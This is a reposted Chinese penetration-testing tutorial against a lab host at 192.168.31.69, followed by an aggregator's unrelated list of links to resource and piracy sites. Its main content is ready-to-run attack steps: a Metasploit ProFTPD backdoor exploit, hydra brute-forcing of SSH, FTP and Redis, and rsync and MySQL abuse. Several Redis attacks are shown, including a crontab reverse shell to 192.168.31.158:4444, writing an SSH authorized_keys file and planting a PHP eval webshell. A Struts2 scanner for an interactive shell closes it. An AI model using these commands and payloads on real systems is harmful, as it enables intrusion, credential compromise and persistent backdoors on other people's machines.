端口渗透·网站渗透过程 --21 ,22,873,3306,6379,8080(8080端口是针对CMS的渗透)...

news/2024/5/9 19:42:17/文章来源:https://blog.csdn.net/weixin_34362790/article/details/94457465

声明:文章渗透网站为模拟环境,文章只为利用过程

文章为信息收集和端口渗透两部分,21端口为ftp版本漏洞 8080端口为CMS的渗透

信息收集:

·使用扫描工具nmap ,PortScan 对整个网段进行扫描

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

信息:通过访问网站得到要测试的IP192.168.31.69

          IP的中间件为Apache/2.4.7 目标系统为Ubuntu

          开放的端口为21(ftp:ProFTPD 1.3.3c). 22(ssh).873 (rsync).3306Mysql. 6379(Redis) .8080(Struts2)

 

访问80端口发现phpinfo页面  phpinfo可获得该IP网站的所有配置信息

 

测试过程

·21端口测试   查看到ftp的版本,搜索得知ftp为ProFTPD 1.3.3c存在后门漏洞

启动MSF的终端

msfconsole

搜索proFTPD的攻击模块,并载入

search proFTPD  //搜索proFTPD的攻击模块

use exploit/unit/ftp/proftpd_133c_backdoor  //载入选择模块

填写模块内容 并执行,之后反弹shell 就ok了

如果不知该填写什么参数可以 show一下

show options  //需要填写的信息

set RHOSTS 192.168.31.69  //目标IP

run  //执行

 

 

当然这只是针对ProFTPD 1.3.3c的利用过程,也可以使用暴力破解,但你的密码库要绝对的强大

 

·22端口测试   使用kali的工具hydra对目标IP的22端口进行暴力破解

爆破命令:

hydra -l(用户名) root -P(爆破字典) /usr/pass.txt(绝对路径,pass.txt为字典文件名,可以将自己的字典加入到该目录下)

 -V(显示爆破过程)  -t(指定线程数)  10  ssh://127.0.0.1(如果是默认端口,可以不写,如果不是默认端口,要加端口xx,如ssh://127.0.0.1:xx)

 

暴力破解获得密码

获得用户及密码后可以使用ssh进行连接22端口

ssh 用户名@IP地址

 

这里介绍一下hydra的一些参数

参数:

    -R 继续从上一次进度接着破解

    -S 大写,采用SSL链接

    -s 小写,可通过这个参数指定非默认端口

    -l 指定破解的用户,对特定用户破解

    -L 指定用户名字典

    -p 小写,指定密码破解,少用,一般是采用密码字典

    -P 大写,指定密码字典

    -e 可选选项,n:空密码试探,s:使用指定用户和密码试探

    -C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

    -M 指定目标列表文件一行一条

    -o 指定结果输出文件

    -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

    -t 同时运行的线程数,默认为16

    -w 设置最大超时的时间,单位秒,默认是30s

    -v /-V显示详细过程

  各协议的具体命令:

    格式+示例:

    1、破解ssh:

    hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh

    hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

    2、破解ftp:

    hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV

    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

参数说明:

-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止

 

·873端口测试  873端口为rsync服务存在未授权访问漏洞

启动MSF的终端

msfconsole

搜索rsync的攻击模块 并载入

search rsync  //搜索rsync的攻击模块

use auxiliary/scanner/rsync/modules_list  //载入要攻击的模块

show options  //需要填写的信息

set rhosts 192.168.31.69 //目标IP

run  //执行

 可以通过命令达到未授权访问WWW文件夹

rsync root@192.168.31.69::   

rsync root@192.168.31.69:WWW

 

 

·3306 端口测试   使用kali的工具进行暴力破解

这里暴力破解使用的还是metasploit frameword

老样子,先启动MSF的终端

msfconsole

因为3306为mysql的服务,所以要搜索关于mysql的模块

search mysql

之后载入选择的模块,我这里选择的是

use auxiliary/scanner/mysql/mysql_login 

show option

填写参数,可以爆破出密码为123456

获得用户名及密码后可以通过其他模块进行执行sql语句

成功执行sql语句

 

·6379 端口测试  6379端口为redis服务,可能存在未授权访问漏洞

要测试redis服务需要在本地安装redis服务

安装:

wget http://download.redis.io/releases/redis-4.0.8.tar.gz     //下载地址

tar xzf redis-4.0.8.tar.gz   //解压下载文件

cd redis-3.2.0   //转到redis-3.2.0目录下

make   //到所在目录中安装

安装成功后需要配置一下文件,可以进行远程访问

vim redis.conf  //打开配置文件

在bind 127.0.0.1前面加上# ,  把protected-mode设为no

使用

先转到redis-3.2.0的src目录下

cd /root/redis-3.2.0/src  

接着启动redis服务

./redis-cli -h 192.168.31.69

发现连接成功可以执行info

方法:

1)利用计划任务执行命令反弹shell

条件:在redis以root权限运行时可以写crontab来执行命令反弹shell

先在自己的服务器上监听一个端口:

nc -lvnp 4444

然后执行命令:

root@kali:~# redis-cli -h 192.168.31.69

192.168.31.69:6379>set x "\n* * * * * bash -i >& /dev/tcp/192.168.31.158/4444 0>&1\n"

ok

192.168.31.69:6379>config set dir /var/spool/cron/

ok

192.168.31.69:6379>config set dbfilename root

ok

192.168.31.69:6379>save

ok

去查看监听的端口,会反弹会shell

2)写ssh-keygen公钥然后使用私钥登陆

 条件:Redis服务使用ROOT账号启动     

            服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器

首先需要在本生成密钥:

然后redis执行命令:

192.168.31.69:6379> config set dir /root/.ssh/
OK
192.168.31.69:6379> config set dbfilename authorized_keys
OK
192.168.31.69:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n"
OK
192.168.31.69:6379> save
OK

然后直接利用公钥登录ssh

ssh -i id_rsa root@192.168.31.69

3)写webshell

条件:开启web服务 且web目录有写入权限 知道绝对路径

192.168.31.69:6379>config set dir /var/www/html/

ok

192.168.31.69:6379>config set dbfilename shell.php

ok

192.168.31.69:6379>set x "<?php @eval($_POST['pass']);?>"

ok

192.168.31.69:6379>save

ok

4)使用hydra暴力破解redis密码

hydra -P passwd.txt redis://192.168.31.69

 

·8080端口测试  发现网站Struts 发现Struts可以使用Struts Scan工具获得指定漏洞交互式shell

 

下载Struts Scan:

git clone https://github.com/Lucifer1993/struts-scan   //下载

tar xzf struts-scan     //解压

cd struts-scan-master  //转到struts-scan-master 下

python struts-scan.py  //运行程序

扫描网站

python struts-scan.py http://192.168.31.69:8080/index.action

使用给出的漏洞交互shell     执行payload

 

转载于:https://www.cnblogs.com/G-Shadow/p/10981711.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_737188.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

dva开发一个cnode网站(4)

增加分类标签&#xff0c;效果如下&#xff1a;1 修改ListData组件 完整代码&#xff1a; import React , { Component }from react; import { List, Avatar, Icon, Spin ,Tag } from antd; import PropTypes from prop-types; import { connect } from dva; import ./my.css; …

网站主要服务器,网站服务器的主要操作系统

网站服务器的主要操作系统 内容精选换一换首先需要准备一台Linux系统的物理服务器作为镜像制作服务器(即宿主机)。制作x86镜像选用x86服务器&#xff0c;制作ARM镜像选用ARM服务器。宿主机必须安装&#xff1a;vsftpd服务sshd服务vnc服务virt-manager工具kvm虚拟化软件虚拟化管…

五个让你一生受用的资源网站

还在为找不到好的资源网站而发愁吗&#xff0c;这里我就向大家分享一下几个资源满满的资源网站&#xff0c;希望你能喜欢。一、55小说网 55小说网是一个专门看小说的网站&#xff0c;里面拥有海量的小说资源&#xff0c;什么类型的都有&#xff0c;包括修真、玄幻、都市、网游…

五款优质资源网站 每一个都让你欲罢不能

是否还在为找找不到想要的资源而烦恼&#xff0c;是否还在百度上搜索找资源&#xff0c;今天我就给大家分享几个优质的资源网站&#xff0c;希望你能喜欢。一、海盗湾 海盗湾&#xff0c;是一个专注分享高清电影BT种子的资源网站&#xff0c;这里有很多种类型的热门电影资源&a…

五大黑科技资源网站,你想要的这里都有

如今的网上资源是越来越多&#xff0c;你想要的一些资源如影视、小说、音乐的等都可以搜索得到&#xff0c;今天我就向大家分享几个非常丰富的资源网站。 1、恒言中文网 一个小说阅读网站&#xff0c;里面有各种各样的小说供你选择&#xff0c;不管是玄幻还是都市&#xff0c…

五个顶级资源网站 就没有你找不到的

随着互联网的崛起&#xff0c;各种各样的网站也随之出现&#xff0c;一些找稀有的资源也出现在各大网站上&#xff0c;今天我就跟大家分享一下几个资源满满的资源网站。1、起点中文网 这是一个小说阅读网站&#xff0c;里面有着各种类型的小说&#xff0c;像玄幻、都市这种非常…

资源任你选,这几个网站你值得收藏

相信有不少人在为找不到资源而烦恼吧&#xff0c;其实如今互联网上资源网站有很多&#xff0c;只是大家都还不知道名字而已&#xff0c;这里我就向大家分享几个非常强大的资源网站。 1、美剧在线看 如今美剧资源越来越难找&#xff0c;更多的是在网盘里搜资源&#xff0c;但是…

悄悄送你几个黑科技资源网站 赶紧收藏起来

如今电脑上的网站成千上万&#xff0c;但是你却不知道几个&#xff0c;今天在这里我就悄悄地和你们分享几个资源泛滥的网站&#xff0c;记得收藏哦。 1、馒头影视 所有片源&#xff0c;画质都相当不俗&#xff01;这点难能可贵&#xff0c;分类丰富&#xff0c;电影、电视剧、…

五个资源巨多的网站 错过了要找就难了

大家都知道&#xff0c;在如今网络通畅&#xff0c;互联网发达的时代&#xff0c;各种各样的资源网站也逐渐浮出水面&#xff0c;今天我就向大家分享几个不错的资源网站&#xff0c;希望你们能找到自己想要的资源。 1、资源狗 这是一个收录了非常多资源网站的比较综合的网站&…

几个强大到没朋友的资源网站 个个都是精品

你想看的小说电影电视有没有在网上搜不到的&#xff0c;其实并不是搜不到&#xff0c;而是你搜索的方式不对&#xff0c;想要找到梦寐以求的资源需要选择对的网站&#xff0c;今天我就为大家介绍几个资源满满的网站&#xff0c;希望有你需要的。1、疯狂影视搜索 疯狂影视搜索是…

五个好评不断的资源网站 绝对不能错过

网络时代的发展已经越来越迅速了&#xff0c;在网站上找资源根本就不用费什么力&#xff0c;只要你知道网站的名字和网址即可&#xff0c;如今的网络和电脑硬盘的强大能满足你对资源的需求。而今天我带来的就是几个资源网站的名字&#xff0c;觉得有用的话就去搜索一下吧。 1、…

找不到资源?这五个网站小说、影视随便看

随着互联网快速的发展&#xff0c;很多强大、优秀的网站都脱颖而出&#xff0c;想要找到好的资源就要在这些网站中寻找&#xff0c;今天我就我为大家带来几款资源非常丰富的网站&#xff0c;就怕你觉得太多了。 1、看看屋 在线观看影视资源网站&#xff0c;你还在百度上面找电…

5个可遇不可求的资源网站 赶紧收藏起来

还在为到处寻找资源而烦恼吗&#xff0c;今天我来和大家分享几款资源超多的网站&#xff0c;不管是影视、动漫&#xff0c;还是学习资源&#xff0c;都应有尽有。一起来看一下吧。 1、搬运工 可以说这是小编比较常用的影视资源网站了&#xff0c;可以说很多新上的影视资源&am…

五个资源超多的资源网站 每一个都是精品

每天都有人在寻找资源&#xff0c;除了在百度上搜索&#xff0c;在其他的网站上也一样可以找到非常多的资源&#xff0c;而今天我为大家分享的就是就几个资源超多的网站&#xff0c;让你找资源不再那么辛苦。 1、嗨哆咪影视 很多人找电影资源都会在网盘中搜索&#xff0c;其实…

分享5个相见恨晚的资源网站 每个都值得收藏

网上的资源永远找不完&#xff0c;随着5G时代即将到来&#xff0c;互联网也将越来越强大&#xff0c;资源网站也会越来越多。今天我就和大家分享几个资源巨多的网站&#xff0c;喜欢的话可以收藏一下。 1、磁力熊 1080P高清电影磁力链接下载站&#xff0c;收录的都是评分非常…

超级强大的五个资源网站 想要的资源都有

还在为找不到资源而烦恼吗&#xff0c;今天在这里和大家分享几个资源超丰富的网站&#xff0c;什么电影、音乐、学习资源&#xff0c;你想要的这里都有。 1、草名电影 宅人必备的影视资源&#xff0c;你除了可以看到最新的电视剧&#xff0c;刚上映没几天的电影也可以看&…

这五个资源超多的资源网站 请务必珍藏起来

现在很多人都会在网上找资源&#xff0c;如今互联网的快速发展也让大家找起资源来非常的容易&#xff0c;只要有好的资源网站&#xff0c;就不怕没有找不到的资源。而今天我和大家分享的就是几个资源超多的网站&#xff0c;希望你们不再缺少资源。 1、落花网 这个就很厉害了&…

资源网站合集 五个值得你收藏的网站

现在网上的资源是非常的多&#xff0c;很多人都喜欢在百度上寻找资源&#xff0c;但是想要找到好看好听的资源却不是那么容易&#xff0c;今天我就为大家分享几个优秀的资源网站&#xff0c;希望你能找到想要的资源。 1、听雨轩 网站里面不仅有网络电台&#xff0c;涵盖了情感…

相见恨晚的5个资源网站 影视音乐资源随你看

找不到资源&#xff1f;资源难找&#xff1f;其实并不是资源太难找&#xff0c;而是你们缺乏一个好的资源网站&#xff0c;今天我就和大家分享几个资源超多的网站&#xff0c;影视、音乐、图片资源应有尽有。 1、徒众在线听歌 徒众在线听歌&#xff0c;这个对于喜欢听歌的小伙…

5个非常牛掰的资源网站 没有你搜不到的资源

还在到处在资源吗&#xff0c;还在百度上搜索资源吗&#xff0c;今天我就为大家带来几个百度搜不到的资源网站&#xff0c;让你的电脑硬盘装满资源。 1、影迷导航网 这个网站主要是用来搜电影资源的&#xff0c;分为在线观看、下载资源、影视推荐、影视服务四个版块&#xff…